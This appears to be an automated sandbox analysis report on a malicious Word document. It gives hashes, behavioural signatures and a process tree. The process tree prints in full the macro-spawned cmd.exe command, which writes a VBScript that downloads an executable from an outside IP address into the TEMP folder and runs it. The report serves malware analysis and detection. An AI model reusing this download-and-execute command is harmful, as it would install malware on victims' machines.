Analysis
-
max time kernel
185s -
max time network
188s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
28-11-2022 00:40
Behavioral task
behavioral1
Sample
2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3.doc
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3.doc
Resource
win10v2004-20221111-en
General
-
Target
2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3.doc
-
Size
35KB
-
MD5
5dab27a18a2851cf1dcae95662a01906
-
SHA1
fc7ebf9cbc7e5e794474775b3ca457cacde46d6a
-
SHA256
2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3
-
SHA512
f11a17c1b905053073ac651085079cb96c2eec4e7b02661c329cd0241a9d91caab5ab8ad527bba057ffc6b739d3134774c9a7601a80d00cae3c2b1e929d88256
-
SSDEEP
384:HaQ2RBJwytUXWsIFdzHe60HZ0jpwXzVF:QBaXWFJe15kozVF
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3444 2348 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
cscript.exeflow pid process 81 3396 cscript.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2348 WINWORD.EXE 2348 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2348 WINWORD.EXE 2348 WINWORD.EXE 2348 WINWORD.EXE 2348 WINWORD.EXE 2348 WINWORD.EXE 2348 WINWORD.EXE 2348 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 2348 wrote to memory of 3444 2348 WINWORD.EXE cmd.exe PID 2348 wrote to memory of 3444 2348 WINWORD.EXE cmd.exe PID 3444 wrote to memory of 3396 3444 cmd.exe cscript.exe PID 3444 wrote to memory of 3396 3444 cmd.exe cscript.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @echo dim gyuFYFGuigddd: Set gyuFYFGuigddd = createobject("Microsoft.XMLHTTP")>gyuFYFGuig.vbs & @echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Open "GET", "http://148.251.87.253/aszxmy/image04.gif", False>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Send>>gyuFYFGuig.vbs & @echo Set environmentVars = WScript.CreateObject("WScript.Shell").Environment("Process")>>gyuFYFGuig.vbs & @echo tempFolder = environmentVars("TEMP")>>gyuFYFGuig.vbs & @echo Fileopen = tempFolder + "\dfsdfff.exe">>gyuFYFGuig.vbs & @echo with bStrm>>gyuFYFGuig.vbs & @echo .type = 1 >>gyuFYFGuig.vbs & @echo .open>>gyuFYFGuig.vbs & @echo .write gyuFYFGuigddd.responseBody>>gyuFYFGuig.vbs & @echo .savetofile Fileopen, 2 >>gyuFYFGuig.vbs & @echo end with>>gyuFYFGuig.vbs & @echo Set GBIviviu67FUGBK = CreateObject("Shell.Application")>>gyuFYFGuig.vbs & @echo GBIviviu67FUGBK.Open Fileopen>>gyuFYFGuig.vbs & cscript.exe gyuFYFGuig.vbs2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cscript.execscript.exe gyuFYFGuig.vbs3⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\gyuFYFGuig.vbsFilesize
606B
MD53911c42e02a3705d35980faec92a4ed1
SHA134aa53e0f129c0c0041bfe920c621b8e67c44ae0
SHA2561097f0919b117a1e3b3a9712bdcca875626d191d006f494acd01d5e2a1b154ed
SHA512fe062a466ec43509a9e720832d9b9c09e8a37808fb27e96e05dc6d50ab79d599486d73de3c3966fea2d55621d43ed7d8cbdba6c99edf198c6f7091bcafefa867
-
memory/2348-133-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmpFilesize
64KB
-
memory/2348-134-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmpFilesize
64KB
-
memory/2348-135-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmpFilesize
64KB
-
memory/2348-136-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmpFilesize
64KB
-
memory/2348-137-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmpFilesize
64KB
-
memory/2348-138-0x00007FFEFA050000-0x00007FFEFA060000-memory.dmpFilesize
64KB
-
memory/2348-139-0x00007FFEFA050000-0x00007FFEFA060000-memory.dmpFilesize
64KB
-
memory/3396-141-0x0000000000000000-mapping.dmp
-
memory/3444-140-0x0000000000000000-mapping.dmp